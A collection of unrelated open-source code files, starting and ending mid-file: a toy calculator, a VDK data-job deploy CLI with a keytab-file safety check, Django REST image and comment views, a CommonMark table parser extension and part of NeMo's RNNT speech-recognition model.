return float(item)
elif isinstance(item, (int, long, bool, float)) or item is None:
return item
elif hasattr(item, "__dict__"):
return {str(k).encode('string_escape'): str(v).encode('string_escape')
for k, v in item.__dict__.iteritems()}
else:
return str(item)
|
the-stack_106_30598 | def calculate(operation, first, second):
if operation == '+':
return first + second
elif operation == '-':
return first - second
elif operation == 'x':
return int(first) * second
elif operation == '/':
return first / second
else:
return 'Invalid operation'
def read_file(file_name):
with open(file_name, 'r') as f:
return f.read().splitlines()
def process():
lines = read_file('data.txt')
for line in lines:
calc, operation, first, second = line.split()
if calc == 'calc':
output = calculate(operation, int(first), int(second))
#print('{0} {1} {2} {3}'.format(calc, operation, first, second))
print(output)
def goto(line_number):
lines = read_file('data.txt')
line = lines[line_number-1]
calc, operation, first, second = line.split()
if calc == 'calc':
output = calculate(operation, int(first), int(second))
print(output)
def goto_calc(input):
print(input)
goto(2)
|
the-stack_106_30600 | # Copyright 2021 VMware, Inc.
# SPDX-License-Identifier: Apache-2.0
import glob
import json
import logging
import os
from typing import Optional
import click
import click_spinner
from tabulate import tabulate
from taurus_datajob_api import ApiException
from taurus_datajob_api import DataJob
from taurus_datajob_api import DataJobConfig
from taurus_datajob_api import DataJobContacts
from taurus_datajob_api import DataJobDeployment
from taurus_datajob_api import DataJobSchedule
from vdk.internal.control.configuration.defaults_config import load_default_team_name
from vdk.internal.control.exception.vdk_exception import VDKException
from vdk.internal.control.job.job_archive import JobArchive
from vdk.internal.control.job.job_config import JobConfig
from vdk.internal.control.rest_lib.factory import ApiClientFactory
from vdk.internal.control.rest_lib.rest_client_errors import ApiClientErrorDecorator
from vdk.internal.control.utils.cli_utils import get_or_prompt
from vdk.internal.control.utils.cli_utils import OutputFormat
log = logging.getLogger(__name__)
class JobDeploy:
ZIP_ARCHIVE_TYPE = "zip"
ARCHIVE_SUFFIX = "-archive"
def __init__(self, rest_api_url: str, output):
self.deploy_api = ApiClientFactory(rest_api_url).get_deploy_api()
self.jobs_api = ApiClientFactory(rest_api_url).get_jobs_api()
self.job_sources_api = ApiClientFactory(rest_api_url).get_jobs_sources_api()
# support for multiple deployments is not implemented yet so we can put anything here.
# Ultimately this will be user facing parameter (possibly fetched from config.ini)
self.__deployment_id = "production"
self.__job_archive = JobArchive()
@staticmethod
def __detect_keytab_files_in_job_directory(job_path: str) -> None:
keytab_glob = os.path.join(job_path, "**/*.keytab")
keytab_files = glob.glob(keytab_glob, recursive=True)
if keytab_files:
raise VDKException(
what=f"Detected keytab file inside data job directory.: {keytab_files}",
why="Keytab files are secret and must be kept separate - usually at the same level as data job directory but not inside.",
consequence="In order to prevent security issues, data job code will not be uploaded and deploy operation is aborted.",
countermeasure="Move the keytab file outside data job directory and try to deploy again.",
)
@staticmethod
def __validate_datajob(job_path: str, job_config: JobConfig, team: str) -> None:
log.debug(
"Validate data job does not have credentials in its directory (keytab file)"
)
JobDeploy.__detect_keytab_files_in_job_directory(job_path)
log.debug("Validate data job team is consistent.")
job_config_team = job_config.get_team()
if team is not None and job_config_team is not None and team != job_config_team:
raise VDKException(
what="Cannot create new deployment of the data job.",
why=f"Team param ({team}) and team value in config.ini ({job_config_team}) do not match.",
consequence="The latest change is not deployed, job will continue to run with previous version.",
countermeasure=f"1. Fix config.ini to set correct team (if it is {team}) OR\n"
f"2. Do not pass team param (team {job_config_team} will be automatically used from config.ini) OR\n"
f"3. Pass param team={job_config_team} OR\n"
f"4. Create a new job with team={team} and try to deploy it\n",
)
# TODO: we may use https://github.com/Yelp/detect-secrets to make sure users do not accidentally pass secrets
@staticmethod
def __check_value(key: str, value: str) -> str:
if not value:
raise VDKException(
what="Cannot extract job configuration.",
why=f"Configuration property {key} in file config.ini is missing.",
consequence="Cannot deploy the Data Job.",
countermeasure="Update config.ini.",
)
return value
def __read_data_job(self, name: str, team: str) -> DataJob:
try:
return self.jobs_api.data_job_read(team_name=team, job_name=name)
except ApiException as e:
raise VDKException(
what=f"Cannot find data job {name}",
why="Data job does not exist on CLOUD.",
consequence="Cannot deploy the Data Job.",
countermeasure="Use VDK CLI create command to create the job first.",
) from e
@staticmethod
def __archive_binary(job_archive_path: str) -> bytes:
log.debug(f"Read archive binary: {job_archive_path}")
with open(job_archive_path, "rb") as job_archive_file:
# Read the whole file at once
job_archive_binary = job_archive_file.read()
return job_archive_binary
@staticmethod
def __cleanup_archive(archive_path: str) -> None:
try:
log.debug(f"Remove temp archive {archive_path}")
os.remove(archive_path)
except OSError as e:
log.warning(
VDKException(
what=f"Cannot cleanup archive: {archive_path} as part of deployment.",
why=f"VDK CLI did not clean up after deploying: {e}",
consequence="There is a leftover archive file next to the folder containing the data job",
countermeasure="Clean up the archive file manually or leave it",
).message
)
def __update_data_job_deploy_configuration(
self, job_path: str, name: str, team: str
) -> None:
job: DataJob = self.__read_data_job(name, team)
local_config = JobConfig(job_path)
schedule = self.__check_value("schedule_cron", local_config.get_schedule_cron())
contacts = DataJobContacts(
local_config.get_contacts_notified_on_job_failure_user_error(),
local_config.get_contacts_notified_on_job_failure_platform_error(),
local_config.get_contacts_notified_on_job_success(),
local_config.get_contacts_notified_on_job_deploy(),
)
job.config = DataJobConfig(
enable_execution_notifications=local_config.get_enable_execution_notifications(),
notification_delay_period_minutes=local_config.get_notification_delay_period_minutes(),
contacts=contacts,
schedule=DataJobSchedule(schedule_cron=schedule),
)
log.debug(f"Update data job deploy configuration: {job}")
self.jobs_api.data_job_update(team_name=team, job_name=name, data_job=job)
@ApiClientErrorDecorator()
def update(
self,
name: str,
team: str,
enabled: Optional[bool], # true, false or None
job_version: Optional[str],
vdk_version: Optional[str],
output: str,
) -> None:
deployment = DataJobDeployment(enabled=None)
if job_version:
deployment.job_version = job_version
if vdk_version:
deployment.vdk_version = vdk_version
deployment.enabled = enabled
if job_version:
self.__update_job_version(name, team, deployment, output)
elif vdk_version or enabled is not None:
self.__update_deployment(name, team, deployment)
msg = f"Deployment of Data Job {name} updated; "
if vdk_version:
msg = msg + f"vdk version: {vdk_version}; "
if enabled is not None:
msg = msg + "status: " + ("enabled" if enabled else "disabled") + "; "
log.info(msg)
else:
log.warning(f"Nothing to update for deployment of job {name}.")
def __update_deployment(
self, name: str, team: str, deployment: DataJobDeployment
) -> None:
log.debug(f"Update Deployment of a job {name} of team {team} : {deployment}")
self.deploy_api.deployment_patch(
team_name=team,
job_name=name,
deployment_id=self.__deployment_id,
data_job_deployment=deployment,
)
def __update_job_version(
self, name: str, team: str, deployment: DataJobDeployment, output: str
):
log.debug(
f"Update Deployment version of a job {name} of team {team} : {deployment}"
)
self.deploy_api.deployment_update(
team_name=team, job_name=name, data_job_deployment=deployment
)
if output == OutputFormat.TEXT.value:
log.info(
f"Request to deploy Data Job {name} using version {deployment.job_version} finished successfully.\n"
f"It would take a few minutes for the Data Job to be deployed in the server.\n"
f"If notified_on_job_deploy option in config.ini is configured then "
f"notification will be sent on successful deploy or in case of an error.\n\n"
f"You can also execute `vdk deploy --show -t {team} -n {name}` and compare the printed version "
f"to the one of the newly deployed job - {deployment.job_version} - to verify that the deployment "
f"was successful."
)
else:
result = {
"job_name": name,
"job_version": deployment.job_version,
}
click.echo(json.dumps(result))
@ApiClientErrorDecorator()
def remove(self, name: str, team: str) -> None:
log.debug(f"Remove Deployment of a job {name} of team {team}")
self.deploy_api.deployment_delete(
team_name=team, job_name=name, deployment_id=self.__deployment_id
)
log.info(f"Deployment of Data Job {name} removed.")
@ApiClientErrorDecorator()
def show(self, name: str, team: str, output: str) -> None:
log.debug(f"Get list of deployments for job {name} of team {team} ")
deployments = self.deploy_api.deployment_list(team_name=team, job_name=name)
log.debug(
f"Found following deployments for job {name} of team {team} : {deployments}"
)
if deployments:
# d.to_dict() brings unnecessary parts of data
deployments = map(
lambda d: dict(
job_name=name,
job_version=d.job_version,
last_deployed_by=d.last_deployed_by,
last_deployed_date=d.last_deployed_date,
enabled=d.enabled,
),
deployments,
)
if output == OutputFormat.TEXT.value:
click.echo(
"You can compare the version seen here to the one seen when "
"deploying to verify your deployment was successful."
)
click.echo("")
click.echo(tabulate(deployments, headers="keys"))
else:
click.echo(json.dumps(list(deployments)))
else:
if output == OutputFormat.TEXT.value:
click.echo("No deployments.")
else:
click.echo(json.dumps([]))
@ApiClientErrorDecorator()
def create(
self,
name: str,
team: str,
job_path: str,
reason: str,
output: str,
vdk_version: Optional[str],
enabled: Optional[bool],
) -> None:
log.debug(
f"Create Deployment of a job {name} of team {team} with local path {job_path} and reason {reason}"
)
job_path = os.path.abspath(job_path)
if not os.path.isdir(job_path):
raise VDKException(
what="Cannot create new deployment of the data job.",
why=f"Directory {job_path} does not exists.",
consequence="The latest change is not deployed, job will continue to run with previous version",
countermeasure="Provide correct path to the Data Job.",
)
log.debug(
"We verify that config.ini exists. This is to avoid uploading accidentally some random directory"
)
job_config = JobConfig(job_path)
self.__validate_datajob(job_path=job_path, job_config=job_config, team=team)
team = get_or_prompt(
"Team Name", team or job_config.get_team() or load_default_team_name()
)
if output == OutputFormat.TEXT.value:
log.info(
f"Deploy Data Job with name {name} from directory {job_path} ... \n"
)
archive_path = self.__job_archive.archive_data_job(
job_name=name, job_archive_path=job_path
)
try:
job_archive_binary = self.__archive_binary(archive_path)
if output == OutputFormat.TEXT.value:
log.info("Uploading the data job might take some time ...")
with click_spinner.spinner(disable=(output == OutputFormat.JSON.value)):
data_job_version = self.job_sources_api.sources_upload(
team_name=team,
job_name=name,
body=job_archive_binary,
reason=reason,
)
self.__update_data_job_deploy_configuration(job_path, name, team)
self.update(
name, team, enabled, data_job_version.version_sha, vdk_version, output
)
finally:
self.__cleanup_archive(archive_path=archive_path)
|
the-stack_106_30601 | from rest_framework.views import APIView
from rest_framework import status
from rest_framework.response import Response
from . import models, serializers
from jin2gram.users import models as user_models
from jin2gram.users import serializers as user_serializers
from jin2gram.notifications import views as notification_views
class Images(APIView):
def get(self, request, format=None):
user = request.user
following_users = user.following.all()
image_list = []
# 내가 follow하는 사람들의 이미지
for following_users in following_users:
# 2개의 이미지만 가져온다
user_image = following_users.images.all()[:2]
for image in user_image:
image_list.append(image)
# 내가 올린 이미지
my_images = user.images.all()[:2]
for image in my_images:
image_list.append(image)
# sorted_list = sorted(image_list, key=get_key, reverse=True)
# 람다식
sorted_list = sorted(image_list, key=lambda image: image.created_at, reverse=True)
serializer = serializers.ImageSerializer(sorted_list, many=True, context={'request': request})
return Response(serializer.data)
def post(self, request, format=None):
user = request.user
serializer = serializers.InputImageSerializer(data=request.data)
if serializer.is_valid():
serializer.save(creator=user)
return Response(data=serializer.data, status=status.HTTP_201_CREATED)
else:
return Response(data=serializer.data, status=status.HTTP_400_BAD_REQUEST)
# def get_key(image):
# return image.created_at
class LikeImage(APIView):
def get(self, request, image_id, format=None):
likes = models.Like.objects.filter(img__id=image_id)
like_creator_ids = likes.values('creator_id')
users = user_models.User.objects.filter(id__in=like_creator_ids)
serializer = user_serializers.ListUserSerializer(users, many=True, context={"request": request})
return Response(data=serializer.data, status=status.HTTP_200_OK)
def post(self, request, image_id, format=None):
user = request.user
try:
found_image = models.Image.objects.get(id=image_id)
except models.Image.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
try:
preexisiting_like = models.Like.objects.get(
creator=user,
img=found_image
)
return Response(status=status.HTTP_304_NOT_MODIFIED)
except models.Like.DoesNotExist:
new_like = models.Like.objects.create(
creator=user,
img=found_image
)
new_like.save()
notification_views.create_notification(user, found_image.creator, 'like', found_image)
return Response(status=status.HTTP_201_CREATED)
class UnLikeImage(APIView):
def delete(self, request, image_id, format=None):
user = request.user
try:
found_image = models.Image.objects.get(id=image_id)
except models.Image.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
try:
preexisiting_like = models.Like.objects.get(
creator=user,
img=found_image
)
preexisiting_like.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
except models.Like.DoesNotExist:
new_like = models.Like.objects.create(
creator=user,
img=found_image
)
return Response(status=status.HTTP_304_NOT_MODIFIED)
class CommentImage(APIView):
def post(self, request, image_id, format=None):
user = request.user
try:
found_image = models.Image.objects.get(id=image_id)
except models.Image.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
serializer = serializers.CommentSerializer(data=request.data)
if serializer.is_valid():
serializer.save(
creator=user,
img=found_image
)
# notification_views.create_notification(user, found_image.creator, 'comment', found_image, request.data['message'])
notification_views.create_notification(
user, found_image.creator, 'comment', found_image, serializer.data['message'])
return Response(data=serializer.data, status=status.HTTP_201_CREATED)
else:
return Response(data=serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class Comment(APIView):
def delete(self, request, comment_id, format=None):
user = request.user
try:
commnet = models.Comment.objects.get(id=comment_id, creator=user)
commnet.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
except models.Comment.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
class ModerateComment(APIView):
# 내가 업로드한 이미지에 달린 댓글을 삭제할 때
def delete(self, request, image_id, comment_id, format=None):
user = request.user
try:
delete_comment = models.Comment.objects.get(id=comment_id, img__id=image_id, img__creator=user)
delete_comment.delete()
except models.Comment.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
return Response(status=status.HTTP_204_NO_CONTENT)
class Search(APIView):
def get(self, request, format=None):
hashtags = request.query_params.get('hashtags', None)
if hashtags is not None:
hashtags = hashtags.split(',')
images = models.Image.objects.filter(tags__name__in=hashtags).distinct()
serializer = serializers.UserProfileImageSerializer(images, many=True)
return Response(data=serializer.data, status=status.HTTP_200_OK)
else:
return Response(status=status.HTTP_400_BAD_REQUEST)
class DetailImage(APIView):
def found_own_image(self, image_id, user):
try:
image = models.Image.objects.get(id=image_id, creator=user)
return image
except models.Image.DoesNotExist:
return None
def get(self, request, image_id, format=None):
try:
image = models.Image.objects.get(id=image_id)
except models.Image.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
serializer = serializers.ImageSerializer(image, context={'request': request})
return Response(data=serializer.data, status=status.HTTP_200_OK)
def put(self, requeset, image_id, format=None):
user = requeset.user
image = self.found_own_image(image_id, user)
if image is None:
return Response(status=status.HTTP_400_BAD_REQUEST)
serializer = serializers.InputImageSerializer(image, data=requeset.data, partial=True)
if serializer.is_valid():
serializer.save(creator=user)
return Response(data=serializer.data, status=status.HTTP_200_OK)
else:
return Response(data=serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def delete(self, request, image_id, format=None):
user = request.user
image = self.found_own_image(image_id, user)
if image is None:
return Response(status=status.HTTP_400_BAD_REQUEST)
image.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
|
the-stack_106_30602 | from djcelery_transactions import task
from celery.registry import tasks
from django.db import transaction
from django.test import TransactionTestCase
my_global = []
marker = object()
@task
def my_task():
my_global.append(marker)
tasks.register(my_task)
class SpecificException(Exception):
pass
class DjangoCeleryTestCase(TransactionTestCase):
"""Test djcelery transaction safe task manager
"""
def tearDown(self):
my_global[:] = []
def test_commited_transaction_fire_task(self):
"""Check that task is consumed when no exception happens
"""
@transaction.commit_on_success
def do_something():
my_task.delay()
do_something()
self.assertTrue(my_global[0] is marker)
def test_rollbacked_transaction_discard_task(self):
"""Check that task is not consumed when exception happens
"""
@transaction.commit_on_success
def do_something():
my_task.delay()
raise SpecificException
try:
do_something()
except SpecificException:
self.assertFalse(my_global)
else:
self.fail('Exception not raised')
|
the-stack_106_30605 | class Solution(object):
def majorityElement(self, nums): # majority element more than n/2
"""
:type nums: List[int]
:rtype: int
"""
count = 1
major = nums[0] # one other elements kills one major , but major num is bigger than the sum of the others.
for i in range(1,len(nums)):
if count == 0:
major = nums[i]
count += 1
elif major == nums[i]:
count += 1
else:
count -= 1
return major
|
the-stack_106_30606 | from collections import defaultdict
import commonmark
import commonmark.blocks
import commonmark.node
# Mokey-patch the reMaybeSpecial regex to add our table symbol |.
# This regex is apparently just an optimization so this should not
# affect CommonMark parser instances that do not recognize tables.
import re
commonmark.blocks.reMaybeSpecial = re.compile(r'^[#`~*+_=<>0-9-|]')
# Define a new BlockStarts class that implements a table method
# to detect and parse table starts, modeled after the blockquote.
class BlockStarts(commonmark.blocks.BlockStarts):
def __init__(self):
self.METHODS = ["table"] + self.METHODS
@staticmethod
def table(parser, container):
if not parser.indented and \
commonmark.blocks.peek(parser.current_line, parser.next_nonspace) == '|':
parser.advance_next_nonspace()
parser.advance_offset(1, False)
parser.close_unmatched_blocks()
parser.add_child('table', parser.next_nonspace)
return 1
return 0
# Define a new Table class that handles incoming table lines, modeled
# a bit after the Blockquote, which allows continuation lines so long as
# they start with the symbol. Also has accepts_lines to suck in everything
# within it as raw data. Accept : as a continuation symbol for
# Github-flavored Markdown table column alignment.
class Table(commonmark.blocks.Block):
accepts_lines = True
@staticmethod
def continue_(parser=None, container=None):
ln = parser.current_line
if not parser.indented and commonmark.blocks.peek(ln, parser.next_nonspace) == "|":
parser.advance_next_nonspace()
parser.advance_offset(1, False)
elif not parser.indented and commonmark.blocks.peek(ln, parser.next_nonspace) not in ("", ">", "`"):
pass
else:
return 1
return 0
@staticmethod
def finalize(parser=None, block=None):
# Split the table content into rows and columns,
# with each line a new row.
#
# Note that the | in the first column is not a
# part of string_content because it was removed
# when we slurped in the table.
table = [[""]]
escape = False
newrowbars = False
for c in block.string_content.rstrip():
# \-escaping
if escape:
table[-1][-1] += c
escape = False
elif c == "\\":
escape = True
# New cell is begun by a bar. Right-strip the cell we're
# ending.
elif c == "|":
table[-1][-1] = table[-1][-1].rstrip()
table[-1].append("")
# New row is begun by a newline.
# Since there's always a pipe at the end of a line,
# pop last cell if empty.
elif c == "\n":
if table[-1][-1].strip() == "": table[-1].pop(-1)
table.append([""])
# Ignore space at start of cell. An escaped space
# can force a space.
elif c in (" ", "\t") and table[-1][-1] == "":
pass
# Content.
else:
table[-1][-1] += c
# Remove the last cell if it's empty since it's caused
# by the final pipe at the end of the last line.
if table[-1][-1].strip() == "":
table[-1].pop(-1)
# Re-flow the table into a <thead> part and a <tbody> part,
# and if the separator row uses ='s instead of -'s then
# treat subsequent rows as multiline rows that must be
# separated by ='s.
column_properties = defaultdict(lambda : {})
table_parts = [[]] # [thead, tbody] or just [tbody]
multiline = False
newrow = False
for row in table:
if len(list(filter(lambda cell : not re.match(r"[-=:]+$", cell), row))) == 0:
# This row has cells of just dahses.
if len(table_parts) == 1:
# The first time, we shift to the tbody.
table_parts.append([])
# We also pick out column properties from the
# placement of a colon.
for i, cell in enumerate(row):
if cell.startswith(":") and cell.endswith(":"):
column_properties[i]["align"] = "center"
elif cell.startswith(":"):
column_properties[i]["align"] = "left"
elif cell.endswith(":"):
column_properties[i]["align"] = "right"
# If ='s were used, then the table is parsed in
# multiline mode.
if "=" in "".join(row):
multiline = True
elif multiline:
# Subsequent times we just note that we're starting a new row
# in multiline mode.
newrow = True
elif not multiline or newrow or len(table_parts[-1]) == 0:
# Append a new row.
table_parts[-1].append(row)
newrow = False
# Fill in empty rows if fewer than the header.
if len(table_parts) > 1 and len(table_parts[0][0]) > len(table_parts[-1][-1]):
table_parts[-1][-1].extend( ["" for _ in range(len(table_parts[0][0]) - len(table_parts[-1][-1])) ] )
else:
# Multline mode. Merge this row with the previous one.
for i in range(len(row)):
if i < len(table_parts[-1][-1]):
table_parts[-1][-1][i] += "\n" + row[i]
else:
table_parts[-1][-1].append(row[i])
# Remove the last table part (probably tbody) if there is no content.
if table_parts[-1] == []:
table_parts.pop(-1)
# Parse the Markdown in each cell using a new parser
# instance for each cell.
if not multiline:
# Just parse the inlines in each cell using the parser's
# inline_parser function. Wrap each cell string content
# in a Node first.
def inner_parser(cell):
node = commonmark.node.Node("document", 0)
node.string_content = cell
parser.inline_parser.parse(node)
return node
else:
# Parse each cell using the full Markdown parser,
# by instantiating a new instance of the same
# parser class first, using the same options.
inner_parser = type(parser)(options=parser.options).parse
for part in table_parts:
for row in part:
for i, cell in enumerate(row):
row[i] = inner_parser(cell)
# Store the parsed table on the node.
block.column_properties = column_properties
block.table = table_parts
commonmark.blocks.Table = Table
# Create a new parser sub-class that adds the new block-start
# for tables.
class ParserWithTables(commonmark.Parser):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.block_starts = BlockStarts()
# Define a new renderer that extends the HtmlRenderer and
# adds table rendering.
class RendererWithTables(commonmark.HtmlRenderer):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def make_table_node(self, node):
return "<table>"
def table(self, node, entering):
if entering:
self.lit(self.make_table_node(node) + "\n")
for i, part in enumerate(node.table):
if i == 0:
part_tag = "thead"
else:
part_tag = "tbody"
self.lit("<" + part_tag + ">\n")
for row in part:
self.lit("<tr>\n")
for colidx, cell in enumerate(row):
if part_tag == "thead":
col_tag = "th"
if self.options.get("table_th_scope"):
col_attrs = ' scope="col"'
else:
col_attrs = ''
else:
col_tag = "td"
col_attrs = ""
if colidx in node.column_properties and "align" in node.column_properties[colidx]:
col_attrs += ' align=\"' + node.column_properties[colidx]["align"] + "\""
self.lit("<" + col_tag + col_attrs + ">")
import copy
inner_renderer = copy.copy(self)
cell = inner_renderer.render(cell)
# If the cell is just one <p>, unwrap it.
m = re.match("<p>(.*)</p>$", cell)
if m:
cell = m.group(1)
self.lit(cell)
self.lit("</" + col_tag + ">\n")
self.lit("</tr>\n")
self.lit("</" + part_tag + ">\n")
self.lit("</table>\n")
# Define a new helper method that would be an in-place replacement
# for commonmark.commonmark.
def commonmark_to_html(markup):
parser = ParserWithTables()
ast = parser.parse(markup)
return RendererWithTables().render(ast)
if __name__ == "__main__":
# Run the parser on STDIN and write to STDOUT.
import sys
parser = ParserWithTables()
ast = parser.parse(sys.stdin.read())
print(RendererWithTables().render(ast))
|
the-stack_106_30608 | from rest_framework import permissions
class IsOwnerOrReadOnly(permissions.BasePermission):
"""
Object-level permission to only allow owners of an object to edit it.
Assumes the model instance has an `owner` attribute.
"""
def has_object_permission(self, request, view, obj):
# Read permissions are allowed to any request,
# so we'll always allow GET, HEAD or OPTIONS requests.
if request.method in permissions.SAFE_METHODS:
return True
if request.user.is_superuser or request.user.has_perm(
"reservations.delete_permission"
):
return True
# Instance must have an attribute named `owner`.
return obj.user == request.user
|
the-stack_106_30610 | # Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import json
import os
import tempfile
from math import ceil
from typing import Dict, List, Optional, Union
import torch
from omegaconf import DictConfig, OmegaConf, open_dict
from pytorch_lightning import Trainer
from torch.utils.data import ChainDataset
from tqdm.auto import tqdm
from nemo.collections.asr.data import audio_to_text_dataset
from nemo.collections.asr.data.audio_to_text_dali import DALIOutputs
from nemo.collections.asr.losses.rnnt import RNNTLoss, resolve_rnnt_default_loss_name
from nemo.collections.asr.metrics.rnnt_wer import RNNTWER, RNNTDecoding
from nemo.collections.asr.models.asr_model import ASRModel, ExportableEncDecJointModel
from nemo.collections.asr.parts.mixins import ASRModuleMixin
from nemo.collections.asr.parts.preprocessing.perturb import process_augmentations
from nemo.core.classes.common import PretrainedModelInfo, typecheck
from nemo.core.neural_types import AcousticEncodedRepresentation, AudioSignal, LengthsType, NeuralType, SpectrogramType
from nemo.utils import logging
class EncDecRNNTModel(ASRModel, ASRModuleMixin, ExportableEncDecJointModel):
"""Base class for encoder decoder RNNT-based models."""
@classmethod
def list_available_models(cls) -> Optional[PretrainedModelInfo]:
"""
This method returns a list of pre-trained model which can be instantiated directly from NVIDIA's NGC cloud.
Returns:
List of available pre-trained models.
"""
result = []
return result
def __init__(self, cfg: DictConfig, trainer: Trainer = None):
# Get global rank and total number of GPU workers for IterableDataset partitioning, if applicable
# Global_rank and local_rank is set by LightningModule in Lightning 1.2.0
self.world_size = 1
if trainer is not None:
self.world_size = trainer.num_nodes * trainer.num_gpus
super().__init__(cfg=cfg, trainer=trainer)
# Initialize components
self.preprocessor = EncDecRNNTModel.from_config_dict(self.cfg.preprocessor)
self.encoder = EncDecRNNTModel.from_config_dict(self.cfg.encoder)
# Update config values required by components dynamically
with open_dict(self.cfg.decoder):
self.cfg.decoder.vocab_size = len(self.cfg.labels)
with open_dict(self.cfg.joint):
self.cfg.joint.num_classes = len(self.cfg.labels)
self.cfg.joint.vocabulary = self.cfg.labels
self.cfg.joint.jointnet.encoder_hidden = self.cfg.model_defaults.enc_hidden
self.cfg.joint.jointnet.pred_hidden = self.cfg.model_defaults.pred_hidden
self.decoder = EncDecRNNTModel.from_config_dict(self.cfg.decoder)
self.joint = EncDecRNNTModel.from_config_dict(self.cfg.joint)
# Setup RNNT Loss
loss_name, loss_kwargs = self.extract_rnnt_loss_cfg(self.cfg.get("loss", None))
self.loss = RNNTLoss(
num_classes=self.joint.num_classes_with_blank - 1, loss_name=loss_name, loss_kwargs=loss_kwargs
)
if hasattr(self.cfg, 'spec_augment') and self._cfg.spec_augment is not None:
self.spec_augmentation = EncDecRNNTModel.from_config_dict(self.cfg.spec_augment)
else:
self.spec_augmentation = None
# Setup decoding objects
self.decoding = RNNTDecoding(
decoding_cfg=self.cfg.decoding, decoder=self.decoder, joint=self.joint, vocabulary=self.joint.vocabulary,
)
# Setup WER calculation
self.wer = RNNTWER(
decoding=self.decoding,
batch_dim_index=0,
use_cer=self._cfg.get('use_cer', False),
log_prediction=self._cfg.get('log_prediction', True),
dist_sync_on_step=True,
)
# Whether to compute loss during evaluation
if 'compute_eval_loss' in self.cfg:
self.compute_eval_loss = self.cfg.compute_eval_loss
else:
self.compute_eval_loss = True
# Setup fused Joint step if flag is set
if self.joint.fuse_loss_wer:
self.joint.set_loss(self.loss)
self.joint.set_wer(self.wer)
self.setup_optim_normalization()
def setup_optim_normalization(self):
"""
Helper method to setup normalization of certain parts of the model prior to the optimization step.
Supported pre-optimization normalizations are as follows:
.. code-block:: yaml
# Variation Noise injection
model:
variational_noise:
std: 0.0
start_step: 0
# Joint - Length normalization
model:
normalize_joint_txu: false
# Encoder Network - gradient normalization
model:
normalize_encoder_norm: false
# Decoder / Prediction Network - gradient normalization
model:
normalize_decoder_norm: false
# Joint - gradient normalization
model:
normalize_joint_norm: false
"""
# setting up the variational noise for the decoder
if hasattr(self.cfg, 'variational_noise'):
self._optim_variational_noise_std = self.cfg['variational_noise'].get('std', 0)
self._optim_variational_noise_start = self.cfg['variational_noise'].get('start_step', 0)
else:
self._optim_variational_noise_std = 0
self._optim_variational_noise_start = 0
# Setup normalized gradients for model joint by T x U scaling factor (joint length normalization)
self._optim_normalize_joint_txu = self.cfg.get('normalize_joint_txu', False)
self._optim_normalize_txu = None
# Setup normalized encoder norm for model
self._optim_normalize_encoder_norm = self.cfg.get('normalize_encoder_norm', False)
# Setup normalized decoder norm for model
self._optim_normalize_decoder_norm = self.cfg.get('normalize_decoder_norm', False)
# Setup normalized joint norm for model
self._optim_normalize_joint_norm = self.cfg.get('normalize_joint_norm', False)
def extract_rnnt_loss_cfg(self, cfg: Optional[DictConfig]):
"""
Helper method to extract the rnnt loss name, and potentially its kwargs
to be passed.
Args:
cfg: Should contain `loss_name` as a string which is resolved to a RNNT loss name.
If the default should be used, then `default` can be used.
Optionally, one can pass additional kwargs to the loss function. The subdict
should have a keyname as follows : `{loss_name}_kwargs`.
Note that whichever loss_name is selected, that corresponding kwargs will be
selected. For the "default" case, the "{resolved_default}_kwargs" will be used.
Examples:
.. code-block:: yaml
loss_name: "default"
warprnnt_numba_kwargs:
kwargs2: some_other_val
Returns:
A tuple, the resolved loss name as well as its kwargs (if found).
"""
if cfg is None:
cfg = DictConfig({})
loss_name = cfg.get("loss_name", "default")
if loss_name == "default":
loss_name = resolve_rnnt_default_loss_name()
loss_kwargs = cfg.get(f"{loss_name}_kwargs", None)
logging.info(f"Using RNNT Loss : {loss_name}\n" f"Loss {loss_name}_kwargs: {loss_kwargs}")
return loss_name, loss_kwargs
@torch.no_grad()
def transcribe(
self,
paths2audio_files: List[str],
batch_size: int = 4,
return_hypotheses: bool = False,
partial_hypothesis: Optional[List['Hypothesis']] = None,
) -> (List[str], Optional[List['Hypothesis']]):
"""
Uses greedy decoding to transcribe audio files. Use this method for debugging and prototyping.
Args:
paths2audio_files: (a list) of paths to audio files. \
Recommended length per file is between 5 and 25 seconds. \
But it is possible to pass a few hours long file if enough GPU memory is available.
batch_size: (int) batch size to use during inference. \
Bigger will result in better throughput performance but would use more memory.
return_hypotheses: (bool) Either return hypotheses or text
With hypotheses can do some postprocessing like getting timestamp or rescoring
Returns:
A list of transcriptions in the same order as paths2audio_files. Will also return
"""
if paths2audio_files is None or len(paths2audio_files) == 0:
return {}
# We will store transcriptions here
hypotheses = []
all_hypotheses = []
# Model's mode and device
mode = self.training
device = next(self.parameters()).device
dither_value = self.preprocessor.featurizer.dither
pad_to_value = self.preprocessor.featurizer.pad_to
try:
self.preprocessor.featurizer.dither = 0.0
self.preprocessor.featurizer.pad_to = 0
# Switch model to evaluation mode
self.eval()
# Freeze the encoder and decoder modules
self.encoder.freeze()
self.decoder.freeze()
self.joint.freeze()
logging_level = logging.get_verbosity()
logging.set_verbosity(logging.WARNING)
# Work in tmp directory - will store manifest file there
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'manifest.json'), 'w') as fp:
for audio_file in paths2audio_files:
entry = {'audio_filepath': audio_file, 'duration': 100000, 'text': 'nothing'}
fp.write(json.dumps(entry) + '\n')
